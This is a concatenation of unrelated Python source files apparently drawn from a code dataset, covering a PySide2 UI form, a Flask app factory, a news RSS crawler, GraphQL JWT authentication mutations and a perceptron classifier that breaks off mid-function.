"No closure date announced. Layoffs": None,
"1st Quarter 2009": datetime(2009, 1, 1),
"02/02/2009\xa0to\xa0\xa012/30/2009": datetime(2009, 2, 2),
"3rd Quarter of 2009": datetime(2009, 6, 1),
"August to December 2008": datetime(2008, 8, 1),
"10/37/2008": datetime(2008, 10, 27),
"2/29/2013": datetime(2013, 2, 28),
"LO-1/14/2011 CL-End of 2012": datetime(2011, 1, 14),
"3rd quarter of 2009": datetime(2009, 6, 1),
}
def prep_row_list(
self, row_list: typing.List[typing.Dict]
) -> typing.List[typing.Dict]:
"""Make necessary transformations to the raw row list prior to transformation.
Args:
row_list (list): A list of raw rows of data from the source.
Returns: The row list minus empty records
"""
# Do the standard stuff
row_list = super().prep_row_list(row_list)
# Cut rows with data-free revisions
return [r for r in row_list if r["Affected Workers"] != "N/A"]
def transform_date(self, value: str) -> typing.Optional[str]:
"""Transform a raw date string into a date object.
Args:
value (str): The raw date string provided by the source
Returns: A date object ready for consolidation. Or, if the date string is invalid, a None.
"""
        # Try corrections before we edit the string
        if value in self.date_corrections:
            dt = self.date_corrections[value]
            # A correction may map to None when no valid date can be recovered
            return str(dt.date()) if dt else None
# A little custom clean up based on the weird stuff from this source
value = value.replace("starting", "")
value = value.strip().split(" and ")[0].strip()
value = value.strip().split(" to ")[0].strip()
value = value.strip().split(" through ")[0].strip()
value = value.strip().split(" - ")[0].strip()
value = value.strip().split(" & ")[0].strip()
value = value.strip().split("\xa0to ")[0].strip()
value = value.strip().split(" – ")[0].strip()
value = value.strip().split("-")[0].strip()
# The same old stuff
return super().transform_date(value)
def check_if_closure(self, row: typing.Dict) -> typing.Optional[bool]:
"""Determine whether a row is a closure or not.
Args:
row (dict): The raw row of data.
Returns: A boolean or null
"""
whitelist = ["CL", "CL -Relocating", "LO and CL", "LO/CL", "PENDING CL"]
return row["Notice Type"] in whitelist or None
| 2.6875
| 3
|
python/mbox/lego/box/block_settings_ui.py
|
chowooseoung/mbox
| 0
|
12782894
|
# -*- coding: utf-8 -*-
################################################################################
## Form generated from reading UI file 'block_settings_ui.ui'
##
## Created by: Qt User Interface Compiler version 5.15.2
##
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
class Ui_Form(object):
def setupUi(self, Form):
if not Form.objectName():
Form.setObjectName(u"Form")
Form.resize(452, 518)
self.gridLayout = QGridLayout(Form)
self.gridLayout.setObjectName(u"gridLayout")
self.verticalSpacer = QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding)
self.gridLayout.addItem(self.verticalSpacer, 5, 0, 1, 1)
self.groupBox = QGroupBox(Form)
self.groupBox.setObjectName(u"groupBox")
sizePolicy = QSizePolicy(QSizePolicy.Minimum, QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox.sizePolicy().hasHeightForWidth())
self.groupBox.setSizePolicy(sizePolicy)
self.gridLayout_2 = QGridLayout(self.groupBox)
self.gridLayout_2.setObjectName(u"gridLayout_2")
self.horizontalLayout_2 = QHBoxLayout()
self.horizontalLayout_2.setObjectName(u"horizontalLayout_2")
self.host_label = QLabel(self.groupBox)
self.host_label.setObjectName(u"host_label")
self.horizontalLayout_2.addWidget(self.host_label)
self.host_lineEdit = QLineEdit(self.groupBox)
self.host_lineEdit.setObjectName(u"host_lineEdit")
self.horizontalLayout_2.addWidget(self.host_lineEdit)
self.host_pushButton = QPushButton(self.groupBox)
self.host_pushButton.setObjectName(u"host_pushButton")
self.horizontalLayout_2.addWidget(self.host_pushButton)
self.gridLayout_2.addLayout(self.horizontalLayout_2, 0, 0, 1, 1)
self.gridLayout.addWidget(self.groupBox, 2, 0, 1, 1)
self.groupBox_4 = QGroupBox(Form)
self.groupBox_4.setObjectName(u"groupBox_4")
sizePolicy.setHeightForWidth(self.groupBox_4.sizePolicy().hasHeightForWidth())
self.groupBox_4.setSizePolicy(sizePolicy)
self.gridLayout_8 = QGridLayout(self.groupBox_4)
self.gridLayout_8.setObjectName(u"gridLayout_8")
self.gridLayout_7 = QGridLayout()
self.gridLayout_7.setObjectName(u"gridLayout_7")
self.gridLayout_9 = QGridLayout()
self.gridLayout_9.setObjectName(u"gridLayout_9")
self.color_fk_label = QLabel(self.groupBox_4)
self.color_fk_label.setObjectName(u"color_fk_label")
sizePolicy1 = QSizePolicy(QSizePolicy.Minimum, QSizePolicy.Preferred)
sizePolicy1.setHorizontalStretch(0)
sizePolicy1.setVerticalStretch(0)
sizePolicy1.setHeightForWidth(self.color_fk_label.sizePolicy().hasHeightForWidth())
self.color_fk_label.setSizePolicy(sizePolicy1)
self.color_fk_label.setMinimumSize(QSize(0, 0))
self.gridLayout_9.addWidget(self.color_fk_label, 0, 1, 1, 1)
self.color_fk_spinBox = QSpinBox(self.groupBox_4)
self.color_fk_spinBox.setObjectName(u"color_fk_spinBox")
sizePolicy2 = QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed)
sizePolicy2.setHorizontalStretch(0)
sizePolicy2.setVerticalStretch(0)
sizePolicy2.setHeightForWidth(self.color_fk_spinBox.sizePolicy().hasHeightForWidth())
self.color_fk_spinBox.setSizePolicy(sizePolicy2)
self.color_fk_spinBox.setMaximum(31)
self.gridLayout_9.addWidget(self.color_fk_spinBox, 0, 2, 1, 1)
self.RGB_fk_pushButton = QPushButton(self.groupBox_4)
self.RGB_fk_pushButton.setObjectName(u"RGB_fk_pushButton")
sizePolicy3 = QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
sizePolicy3.setHorizontalStretch(0)
sizePolicy3.setVerticalStretch(0)
sizePolicy3.setHeightForWidth(self.RGB_fk_pushButton.sizePolicy().hasHeightForWidth())
self.RGB_fk_pushButton.setSizePolicy(sizePolicy3)
self.RGB_fk_pushButton.setMaximumSize(QSize(16777215, 16777215))
self.RGB_fk_pushButton.setLayoutDirection(Qt.LeftToRight)
self.RGB_fk_pushButton.setStyleSheet(u"")
self.gridLayout_9.addWidget(self.RGB_fk_pushButton, 0, 3, 1, 1)
self.RGB_fk_slider = QSlider(self.groupBox_4)
self.RGB_fk_slider.setObjectName(u"RGB_fk_slider")
self.RGB_fk_slider.setMaximum(255)
self.RGB_fk_slider.setOrientation(Qt.Horizontal)
self.gridLayout_9.addWidget(self.RGB_fk_slider, 0, 4, 1, 1)
self.fk_label_2 = QLabel(self.groupBox_4)
self.fk_label_2.setObjectName(u"fk_label_2")
self.gridLayout_9.addWidget(self.fk_label_2, 0, 0, 1, 1)
self.gridLayout_7.addLayout(self.gridLayout_9, 1, 0, 1, 1)
self.gridLayout_10 = QGridLayout()
self.gridLayout_10.setObjectName(u"gridLayout_10")
self.color_ik_spinBox = QSpinBox(self.groupBox_4)
self.color_ik_spinBox.setObjectName(u"color_ik_spinBox")
sizePolicy2.setHeightForWidth(self.color_ik_spinBox.sizePolicy().hasHeightForWidth())
self.color_ik_spinBox.setSizePolicy(sizePolicy2)
self.color_ik_spinBox.setMaximum(31)
self.gridLayout_10.addWidget(self.color_ik_spinBox, 0, 2, 1, 1)
self.color_ik_label = QLabel(self.groupBox_4)
self.color_ik_label.setObjectName(u"color_ik_label")
sizePolicy1.setHeightForWidth(self.color_ik_label.sizePolicy().hasHeightForWidth())
self.color_ik_label.setSizePolicy(sizePolicy1)
self.color_ik_label.setMinimumSize(QSize(0, 0))
self.gridLayout_10.addWidget(self.color_ik_label, 0, 1, 1, 1)
self.RGB_ik_pushButton = QPushButton(self.groupBox_4)
self.RGB_ik_pushButton.setObjectName(u"RGB_ik_pushButton")
sizePolicy3.setHeightForWidth(self.RGB_ik_pushButton.sizePolicy().hasHeightForWidth())
self.RGB_ik_pushButton.setSizePolicy(sizePolicy3)
self.RGB_ik_pushButton.setMaximumSize(QSize(16777215, 16777215))
self.RGB_ik_pushButton.setLayoutDirection(Qt.LeftToRight)
self.RGB_ik_pushButton.setStyleSheet(u"")
self.gridLayout_10.addWidget(self.RGB_ik_pushButton, 0, 3, 1, 1)
self.RGB_ik_slider = QSlider(self.groupBox_4)
self.RGB_ik_slider.setObjectName(u"RGB_ik_slider")
self.RGB_ik_slider.setMaximum(255)
self.RGB_ik_slider.setOrientation(Qt.Horizontal)
self.gridLayout_10.addWidget(self.RGB_ik_slider, 0, 4, 1, 1)
self.ik_label = QLabel(self.groupBox_4)
self.ik_label.setObjectName(u"ik_label")
self.gridLayout_10.addWidget(self.ik_label, 0, 0, 1, 1)
self.gridLayout_7.addLayout(self.gridLayout_10, 1, 1, 1, 1)
self.overrideColors_checkBox = QCheckBox(self.groupBox_4)
self.overrideColors_checkBox.setObjectName(u"overrideColors_checkBox")
self.gridLayout_7.addWidget(self.overrideColors_checkBox, 0, 0, 1, 1)
self.useRGB_checkBox = QCheckBox(self.groupBox_4)
self.useRGB_checkBox.setObjectName(u"useRGB_checkBox")
self.gridLayout_7.addWidget(self.useRGB_checkBox, 0, 1, 1, 1)
self.gridLayout_8.addLayout(self.gridLayout_7, 2, 0, 1, 1)
self.gridLayout.addWidget(self.groupBox_4, 4, 0, 1, 1)
self.mainSettings_groupBox = QGroupBox(Form)
self.mainSettings_groupBox.setObjectName(u"mainSettings_groupBox")
self.gridLayout_4 = QGridLayout(self.mainSettings_groupBox)
self.gridLayout_4.setObjectName(u"gridLayout_4")
self.formLayout = QFormLayout()
self.formLayout.setObjectName(u"formLayout")
self.name_label = QLabel(self.mainSettings_groupBox)
self.name_label.setObjectName(u"name_label")
self.formLayout.setWidget(0, QFormLayout.LabelRole, self.name_label)
self.name_lineEdit = QLineEdit(self.mainSettings_groupBox)
self.name_lineEdit.setObjectName(u"name_lineEdit")
self.formLayout.setWidget(0, QFormLayout.FieldRole, self.name_lineEdit)
self.side_label = QLabel(self.mainSettings_groupBox)
self.side_label.setObjectName(u"side_label")
self.formLayout.setWidget(1, QFormLayout.LabelRole, self.side_label)
self.side_comboBox = QComboBox(self.mainSettings_groupBox)
self.side_comboBox.addItem("")
self.side_comboBox.addItem("")
self.side_comboBox.addItem("")
self.side_comboBox.setObjectName(u"side_comboBox")
sizePolicy2.setHeightForWidth(self.side_comboBox.sizePolicy().hasHeightForWidth())
self.side_comboBox.setSizePolicy(sizePolicy2)
self.formLayout.setWidget(1, QFormLayout.FieldRole, self.side_comboBox)
self.componentIndex_label = QLabel(self.mainSettings_groupBox)
self.componentIndex_label.setObjectName(u"componentIndex_label")
self.formLayout.setWidget(2, QFormLayout.LabelRole, self.componentIndex_label)
self.componentIndex_spinBox = QSpinBox(self.mainSettings_groupBox)
self.componentIndex_spinBox.setObjectName(u"componentIndex_spinBox")
sizePolicy2.setHeightForWidth(self.componentIndex_spinBox.sizePolicy().hasHeightForWidth())
self.componentIndex_spinBox.setSizePolicy(sizePolicy2)
self.componentIndex_spinBox.setMaximum(999)
self.formLayout.setWidget(2, QFormLayout.FieldRole, self.componentIndex_spinBox)
self.conector_label = QLabel(self.mainSettings_groupBox)
self.conector_label.setObjectName(u"conector_label")
self.formLayout.setWidget(3, QFormLayout.LabelRole, self.conector_label)
self.connector_comboBox = QComboBox(self.mainSettings_groupBox)
self.connector_comboBox.addItem("")
self.connector_comboBox.setObjectName(u"connector_comboBox")
sizePolicy2.setHeightForWidth(self.connector_comboBox.sizePolicy().hasHeightForWidth())
self.connector_comboBox.setSizePolicy(sizePolicy2)
self.formLayout.setWidget(3, QFormLayout.FieldRole, self.connector_comboBox)
self.gridLayout_4.addLayout(self.formLayout, 0, 0, 1, 1)
self.gridLayout.addWidget(self.mainSettings_groupBox, 0, 0, 1, 1)
self.groupBox_2 = QGroupBox(Form)
self.groupBox_2.setObjectName(u"groupBox_2")
sizePolicy.setHeightForWidth(self.groupBox_2.sizePolicy().hasHeightForWidth())
self.groupBox_2.setSizePolicy(sizePolicy)
self.gridLayout_5 = QGridLayout(self.groupBox_2)
self.gridLayout_5.setObjectName(u"gridLayout_5")
self.horizontalLayout_3 = QHBoxLayout()
self.horizontalLayout_3.setObjectName(u"horizontalLayout_3")
self.subGroup_lineEdit = QLineEdit(self.groupBox_2)
self.subGroup_lineEdit.setObjectName(u"subGroup_lineEdit")
self.horizontalLayout_3.addWidget(self.subGroup_lineEdit)
self.gridLayout_5.addLayout(self.horizontalLayout_3, 0, 0, 1, 1)
self.gridLayout.addWidget(self.groupBox_2, 3, 0, 1, 1)
self.jointSettings_groupBox = QGroupBox(Form)
self.jointSettings_groupBox.setObjectName(u"jointSettings_groupBox")
sizePolicy.setHeightForWidth(self.jointSettings_groupBox.sizePolicy().hasHeightForWidth())
self.jointSettings_groupBox.setSizePolicy(sizePolicy)
self.gridLayout_3 = QGridLayout(self.jointSettings_groupBox)
self.gridLayout_3.setObjectName(u"gridLayout_3")
self.verticalLayout = QVBoxLayout()
self.verticalLayout.setObjectName(u"verticalLayout")
self.horizontalLayout_5 = QHBoxLayout()
self.horizontalLayout_5.setObjectName(u"horizontalLayout_5")
self.horizontalLayout_5.setContentsMargins(-1, -1, -1, 0)
self.useJointIndex_checkBox = QCheckBox(self.jointSettings_groupBox)
self.useJointIndex_checkBox.setObjectName(u"useJointIndex_checkBox")
self.horizontalLayout_5.addWidget(self.useJointIndex_checkBox)
self.parentJointIndex_spinBox = QSpinBox(self.jointSettings_groupBox)
self.parentJointIndex_spinBox.setObjectName(u"parentJointIndex_spinBox")
sizePolicy2.setHeightForWidth(self.parentJointIndex_spinBox.sizePolicy().hasHeightForWidth())
self.parentJointIndex_spinBox.setSizePolicy(sizePolicy2)
self.parentJointIndex_spinBox.setMinimum(-1)
self.parentJointIndex_spinBox.setMaximum(999999)
self.parentJointIndex_spinBox.setValue(-1)
self.horizontalLayout_5.addWidget(self.parentJointIndex_spinBox)
self.verticalLayout.addLayout(self.horizontalLayout_5)
self.horizontalLayout = QHBoxLayout()
self.horizontalLayout.setObjectName(u"horizontalLayout")
self.jointNames_label = QLabel(self.jointSettings_groupBox)
self.jointNames_label.setObjectName(u"jointNames_label")
sizePolicy4 = QSizePolicy(QSizePolicy.Minimum, QSizePolicy.Fixed)
sizePolicy4.setHorizontalStretch(0)
sizePolicy4.setVerticalStretch(0)
sizePolicy4.setHeightForWidth(self.jointNames_label.sizePolicy().hasHeightForWidth())
self.jointNames_label.setSizePolicy(sizePolicy4)
self.jointNames_label.setMinimumSize(QSize(0, 0))
self.horizontalLayout.addWidget(self.jointNames_label)
self.jointNames_pushButton = QPushButton(self.jointSettings_groupBox)
self.jointNames_pushButton.setObjectName(u"jointNames_pushButton")
sizePolicy2.setHeightForWidth(self.jointNames_pushButton.sizePolicy().hasHeightForWidth())
self.jointNames_pushButton.setSizePolicy(sizePolicy2)
self.horizontalLayout.addWidget(self.jointNames_pushButton)
self.verticalLayout.addLayout(self.horizontalLayout)
self.groupBox_3 = QGroupBox(self.jointSettings_groupBox)
self.groupBox_3.setObjectName(u"groupBox_3")
self.horizontalLayout_4 = QHBoxLayout(self.groupBox_3)
self.horizontalLayout_4.setObjectName(u"horizontalLayout_4")
self.joint_offset_x_doubleSpinBox = QDoubleSpinBox(self.groupBox_3)
self.joint_offset_x_doubleSpinBox.setObjectName(u"joint_offset_x_doubleSpinBox")
self.joint_offset_x_doubleSpinBox.setMinimum(-360.000000000000000)
self.joint_offset_x_doubleSpinBox.setMaximum(360.000000000000000)
self.joint_offset_x_doubleSpinBox.setSingleStep(90.000000000000000)
self.horizontalLayout_4.addWidget(self.joint_offset_x_doubleSpinBox)
self.joint_offset_y_doubleSpinBox = QDoubleSpinBox(self.groupBox_3)
self.joint_offset_y_doubleSpinBox.setObjectName(u"joint_offset_y_doubleSpinBox")
self.joint_offset_y_doubleSpinBox.setMinimum(-360.000000000000000)
self.joint_offset_y_doubleSpinBox.setMaximum(360.000000000000000)
self.joint_offset_y_doubleSpinBox.setSingleStep(90.000000000000000)
self.horizontalLayout_4.addWidget(self.joint_offset_y_doubleSpinBox)
self.joint_offset_z_doubleSpinBox = QDoubleSpinBox(self.groupBox_3)
self.joint_offset_z_doubleSpinBox.setObjectName(u"joint_offset_z_doubleSpinBox")
self.joint_offset_z_doubleSpinBox.setMinimum(-360.000000000000000)
self.joint_offset_z_doubleSpinBox.setMaximum(360.000000000000000)
self.joint_offset_z_doubleSpinBox.setSingleStep(90.000000000000000)
self.horizontalLayout_4.addWidget(self.joint_offset_z_doubleSpinBox)
self.verticalLayout.addWidget(self.groupBox_3)
self.gridLayout_3.addLayout(self.verticalLayout, 0, 0, 1, 1)
self.gridLayout.addWidget(self.jointSettings_groupBox, 1, 0, 1, 1)
self.retranslateUi(Form)
QMetaObject.connectSlotsByName(Form)
# setupUi
def retranslateUi(self, Form):
Form.setWindowTitle(QCoreApplication.translate("Form", u"Form", None))
self.groupBox.setTitle(QCoreApplication.translate("Form", u"Channels Host Settings", None))
self.host_label.setText(QCoreApplication.translate("Form", u"Host:", None))
self.host_pushButton.setText(QCoreApplication.translate("Form", u"<<", None))
self.groupBox_4.setTitle(QCoreApplication.translate("Form", u"Color Settings", None))
self.color_fk_label.setText("")
self.RGB_fk_pushButton.setText("")
self.fk_label_2.setText(QCoreApplication.translate("Form", u"FK", None))
self.color_ik_label.setText("")
self.RGB_ik_pushButton.setText("")
self.ik_label.setText(QCoreApplication.translate("Form", u"IK", None))
self.overrideColors_checkBox.setText(QCoreApplication.translate("Form", u"Override Colors", None))
self.useRGB_checkBox.setText(QCoreApplication.translate("Form", u"Use RGB Colors", None))
self.mainSettings_groupBox.setTitle("")
self.name_label.setText(QCoreApplication.translate("Form", u"Name:", None))
self.side_label.setText(QCoreApplication.translate("Form", u"Side:", None))
self.side_comboBox.setItemText(0, QCoreApplication.translate("Form", u"Center", None))
self.side_comboBox.setItemText(1, QCoreApplication.translate("Form", u"Left", None))
self.side_comboBox.setItemText(2, QCoreApplication.translate("Form", u"Right", None))
self.componentIndex_label.setText(QCoreApplication.translate("Form", u"Component Index:", None))
self.conector_label.setText(QCoreApplication.translate("Form", u"Connector:", None))
self.connector_comboBox.setItemText(0, QCoreApplication.translate("Form", u"standard", None))
self.groupBox_2.setTitle(QCoreApplication.translate("Form", u"Custom Controllers Group", None))
#if QT_CONFIG(tooltip)
        self.subGroup_lineEdit.setToolTip(QCoreApplication.translate("Form", u"<html><head/><body><p>Name for a custom controllers Group (Maya set) for the component controllers.</p><p align=\"center\"><span style=\" font-weight:600;\">i.e</span>: Setting the name &quot;arm&quot; will create a sub group (sub set in Maya's terminology) with the name &quot;rig_arm_grp&quot;. This group will be under the &quot;rig_controllers_grp&quot;</p><p>Leave this option empty for the default behaviour.</p></body></html>", None))
#endif // QT_CONFIG(tooltip)
self.jointSettings_groupBox.setTitle(QCoreApplication.translate("Form", u"Joint Settings", None))
self.useJointIndex_checkBox.setText(QCoreApplication.translate("Form", u"Parent Joint Index", None))
self.jointNames_label.setText(QCoreApplication.translate("Form", u"Joint Names", None))
self.jointNames_pushButton.setText(QCoreApplication.translate("Form", u"Configure", None))
self.groupBox_3.setTitle(QCoreApplication.translate("Form", u"Orientation Offset XYZ", None))
#if QT_CONFIG(tooltip)
self.joint_offset_x_doubleSpinBox.setToolTip(QCoreApplication.translate("Form", u"Rotation Offset X", None))
#endif // QT_CONFIG(tooltip)
#if QT_CONFIG(tooltip)
self.joint_offset_y_doubleSpinBox.setToolTip(QCoreApplication.translate("Form", u"Rotation Offset Y", None))
#endif // QT_CONFIG(tooltip)
#if QT_CONFIG(tooltip)
self.joint_offset_z_doubleSpinBox.setToolTip(QCoreApplication.translate("Form", u"Rotation Offset Z", None))
#endif // QT_CONFIG(tooltip)
# retranslateUi
| 2.09375
| 2
|
app/__init__.py
|
sd19surf/flask
| 0
|
12782895
|
from flask import Flask
def create_app():
app = Flask(__name__)
# register routes with app instead of current_app:
from app.main import bp as main_bp
app.register_blueprint(main_bp)
return app
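
# A minimal sketch of using the factory (the run target and debug flag are
# illustrative):
#
#     from app import create_app
#     app = create_app()
#     app.run(debug=True)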
| 1.992188
| 2
|
newspaper_crawler/crawling_jobs/futurasciences_crawling_job.py
|
jeugregg/newspaper-crawler
| 8
|
12782896
|
from .base_crawling_job import BaseCrawlingJob
from ..spiders import FuturaSciencesSpider
class FuturaSciencesCrawlingJob(BaseCrawlingJob):
def __init__(self, has_database):
BaseCrawlingJob.__init__(self, has_database)
self.newspaper = "futura-sciences"
self.NewspaperSpider = FuturaSciencesSpider
self.rss_feeds = [
"http://www.futura-sciences.com/rss/actualites.xml",
"http://www.futura-sciences.com/rss/sante/actualites.xml",
"http://www.futura-sciences.com/rss/high-tech/actualites.xml",
"http://www.futura-sciences.com/rss/espace/actualites.xml",
"http://www.futura-sciences.com/rss/environnement/actualites.xml",
"http://www.futura-sciences.com/rss/maison/actualites.xml",
"http://www.futura-sciences.com/rss/nature/actualites.xml",
"http://www.futura-sciences.com/rss/terre/actualites.xml",
"http://www.futura-sciences.com/rss/matiere/actualites.xml",
"http://www.futura-sciences.com/rss/mathematiques/actualites.xml",
]
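
# A minimal sketch (hypothetical driver; BaseCrawlingJob is expected to wire
# self.NewspaperSpider to self.rss_feeds):
#
#     job = FuturaSciencesCrawlingJob(has_database=False)
#     print(job.newspaper, len(job.rss_feeds))   # futura-sciences 10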
| 2.640625
| 3
|
justice/parser/line_parser/abc.py
|
it-matters-cz/justice
| 0
|
12782897
|
import abc
import dateparser
class AbstractLineParser(abc.ABC):
def parse(self, data):
parsed_date = None
parsed_data = self.parse_data(data[0])
if len(data) > 1:
parsed_date = self.parse_date(data[1])
return parsed_data, parsed_date
@abc.abstractmethod
def parse_data(self, data):
pass
    @staticmethod
    def parse_date(data: str):
        result = {}
        expire = data.split('\n')
        # strip the Czech prefix 'zapsáno' ("registered on") before parsing
        expire_from = expire[0].replace('zapsáno\xa0', '')
        result['valid_from'] = dateparser.parse(expire_from)
        if len(expire) == 2:
            # strip the Czech prefix 'vymazáno' ("deleted on") before parsing
            expire_to = expire[1].replace('vymazáno\xa0', '')
            result['valid_to'] = dateparser.parse(expire_to)
        return result
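
# A minimal sketch of a concrete parser (the subclass and input strings are
# hypothetical):
#
#     class NameLineParser(AbstractLineParser):
#         def parse_data(self, data):
#             return {"name": data.strip()}
#
#     parsed, dates = NameLineParser().parse(["ACME a.s.", "zapsáno\xa07. 5. 2001"])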
| 3.34375
| 3
|
dwconv1d/__init__.py
|
ashishpatel26/depthwiseconv1d
| 6
|
12782898
|
from .depthwiseconv1d import DepthwiseConv1D
__all__ = [
'DepthwiseConv1D'
]
| 1.0625
| 1
|
graphene_django_jwt/schema/mutations.py
|
Speedy1991/graphene-django-jwt
| 0
|
12782899
|
from calendar import timegm
from django.contrib.auth import get_user_model
from django.contrib.auth.signals import user_logged_in, user_logged_out
from django.db import transaction
import graphene
from graphene.types.generic import GenericScalar
from graphene_django_jwt import signals
from graphene_django_jwt.blacklist import Blacklist
from graphene_django_jwt.decorators import login_required
from graphene_django_jwt.exceptions import JSONRefreshTokenExpired, JSONWebTokenExpired, PermissionDenied
from graphene_django_jwt.models import RefreshToken
from graphene_django_jwt.shortcuts import get_refresh_token, get_token
from graphene_django_jwt.utils import create_refresh_token, get_payload, jwt_encode, jwt_payload
UserModel = get_user_model()
class RevokeAllTokensMutation(graphene.Mutation):
revoked_tokens = graphene.List(graphene.NonNull(graphene.String), required=True)
@login_required
def mutate(self, info, **kwargs):
revoked_tokens = []
for rt in RefreshToken.objects.filter(user_id=info.context.user.id, revoked__isnull=True):
rt.revoke()
revoked_tokens.append(rt.get_token())
return RevokeAllTokensMutation(revoked_tokens=revoked_tokens)
class ObtainJSONWebTokenMutation(graphene.Mutation):
token = graphene.String(required=True)
refresh_token = graphene.String(required=True)
class Arguments:
username = graphene.String(required=True)
password = graphene.String(required=True)
def mutate(self, info, username, password):
user = UserModel.objects.filter(username=username).first()
if user is None:
raise PermissionDenied
if not user.is_active:
raise PermissionDenied
if not user.check_password(password):
raise PermissionDenied
refresh_token = create_refresh_token(user).get_token()
payload = jwt_payload(user, refresh_token=refresh_token)
token = jwt_encode(payload)
user_logged_in.send(sender=ObtainJSONWebTokenMutation, request=info.context, user=user)
return ObtainJSONWebTokenMutation(token=token, refresh_token=refresh_token)
class RefreshMutation(graphene.Mutation):
token = graphene.String(required=True)
payload = GenericScalar(required=True)
refresh_token = graphene.String(required=True)
class Arguments:
refresh_token = graphene.String(required=True)
def mutate(self, info, refresh_token):
refresh_token = get_refresh_token(refresh_token)
if refresh_token.revoked:
raise JSONRefreshTokenExpired
if refresh_token.is_expired():
raise JSONRefreshTokenExpired
refreshed_token = refresh_token.rotate()
payload = jwt_payload(refresh_token.user, refresh_token=refreshed_token.get_token())
token = jwt_encode(payload)
signals.refresh_finished.send(
sender=RefreshToken,
user=refresh_token.user,
request=info.context,
)
return RefreshMutation(token=token, payload=payload, refresh_token=refreshed_token.get_token())
class RevokeMutation(graphene.Mutation):
revoked = graphene.Int(required=True)
class Arguments:
refresh_token = graphene.String(required=True)
def mutate(self, info, refresh_token):
refresh_token = get_refresh_token(refresh_token)
refresh_token.revoke()
return RevokeMutation(revoked=timegm(refresh_token.revoked.timetuple()))
class VerifyMutation(graphene.Mutation):
payload = GenericScalar(required=True)
class Arguments:
token = graphene.String(required=True)
def mutate(self, info, token):
payload = get_payload(token)
if Blacklist.is_blacklisted(payload['refresh_token']):
raise JSONWebTokenExpired
return VerifyMutation(payload=payload)
class LogoutMutation(graphene.Mutation):
success = graphene.Boolean(required=True)
class Arguments:
refresh_token = graphene.String(required=False)
@login_required
def mutate(self, info, refresh_token=None, **kwargs):
if refresh_token:
refresh_token = get_refresh_token(refresh_token)
refresh_token.revoke()
user_logged_out.send(sender=self.__class__, request=info.context, user=info.context.user)
return LogoutMutation(success=True)
class SignUpMutation(graphene.Mutation):
token = graphene.String(required=True)
class Arguments:
password = graphene.String(required=True)
username = graphene.String(required=True)
@transaction.atomic
def mutate(self, info, username, password, **kwargs):
user = UserModel.objects.create_user(
username=username,
password=password,
)
refresh_token = create_refresh_token(user)
token = get_token(
user,
refresh_token=refresh_token.token,
)
user_logged_in.send(sender=user.__class__, request=info.context, user=user)
return SignUpMutation(token=token)
class Mutation(graphene.ObjectType):
jwt_sign_in = ObtainJSONWebTokenMutation.Field(required=True)
jwt_sign_up = SignUpMutation.Field(required=True)
jwt_refresh_token = RefreshMutation.Field(required=True)
jwt_revoke_token = RevokeMutation.Field(required=True)
jwt_verify_token = VerifyMutation.Field(required=True)
jwt_revoke_all_tokens = RevokeAllTokensMutation.Field(required=True)
jwt_logout = LogoutMutation.Field(required=True)
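
# Example GraphQL operation against the fields registered above (names are
# auto-camelcased by graphene's default settings; credential values are
# placeholders):
#
#     mutation {
#       jwtSignIn(username: "alice", password: "secret") {
#         token
#         refreshToken
#       }
#     }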
| 1.96875
| 2
|
My_NN.py
|
aaksul/Classifying-Letters-With-Perceptron-Method
| 0
|
12782900
|
import numpy as np
class layer():
def __init__(self,name,type,nodes_number):
self.name=name
self.type=type
self.nodes_number=nodes_number
self.input_values=np.zeros(shape=(nodes_number,1),dtype=float)##input values of nodes
self.sum_values=np.zeros(shape=(nodes_number,1),dtype=float)##sum values of nodes
self.output_values=np.zeros(shape=(nodes_number,1),dtype=float)##output values of nodes
def set_input_values(self,input):
self.input_values=input
if (self.type=="input"):
self.set_output_values(input)
def set_output_values(self,output):
self.output_values=output
class Model():
def __init__(self,method,input_type,perceptron_rule):
        self.method=method##training method, e.g. "perceptron"
        self.perceptron_rule=perceptron_rule
        self.layers=[]##layers of the Model
        self.input_type=input_type
        """For Training """
        self.Connections_Weight=[]##weight matrices of the connections between layers
        self.Connections_Bias=[]##bias vectors of the connections between layers
        self.input_number=0##total number of training inputs, used for iteration during each epoch
        self.input_length=0##length of each input vector
        self.input_arr=0##input array
        self.output_arr=0##output array
        self.output_length=0##output length (also the length of each label vector)
def add_layer(self,layer):
self.layers.append(layer)
def create_weight_and_bias_array(self,layer1,layer2,bias):
        ##create weight and bias arrays whose shapes match the node counts of the connected layers
w_array=np.zeros(shape=(layer1.nodes_number,layer2.nodes_number),dtype=float)
self.Connections_Weight.append(w_array)##append to model weight list
b_array=np.full(shape=(layer2.nodes_number),fill_value=float(bias))
self.Connections_Bias.append(b_array)
def set_input_values(self,input_arr,input_number,input_length):
if(type(input_arr)!=np.ndarray):
raise Exception("Type Error: given input aren't ndarray")
input_layer=self.layers[0]
if not(input_length==input_layer.input_values.shape[0]):
raise Exception("input's length and nodes number of input layer aren't matched")
self.input_number=input_number
self.input_length=input_length
self.input_arr=input_arr
def set_output_values(self,output_arr,output_length):
if(type(output_arr)!=np.ndarray):
raise Exception("Type Error: given output aren't ndarray")
output_layer=self.layers[-1]
if not(output_length==output_layer.output_values.shape[0]):
raise Exception("output's length and nodes number of output layer aren't matched")
self.output_length=output_length
self.output_arr=output_arr
def activation_func(self,y_in,th):
y=1.0
if (-th < y_in < th):
y=0
elif (y_in<-th):
y=-1.0
return y
def activation_func_bin(self,y_in,th):
y=1.0
if (y_in < th):
y=0
return y
def default_rule(self,input_arr,out,w_array,b_array,n,j):
for k,inp in enumerate(input_arr):##Update weights
w_array[k][j]=w_array[k][j]+n*out*inp
b_array[j]=b_array[j]+n*out##Update bias value
def delta_rule(self,input_arr,out,w_array,b_array,n,j,y):
for k,inp in enumerate(input_arr):##Update weights
w_array[k][j]=w_array[k][j]+n*(out-y)*inp
b_array[j]=b_array[j]+n*(out-y)##Update bias value
def Feed_Forward_Perceptron(self,input_arr,output_arr,n,th):
        #bool=np.full((input_layer.nodes_number,output_layer.nodes_number),False)##boolean matrix for weight values
        #while bool.all()!=True:##until the weights of every connection satisfy the equation
w_array=self.Connections_Weight[0]
b_array=self.Connections_Bias[0]
y=0
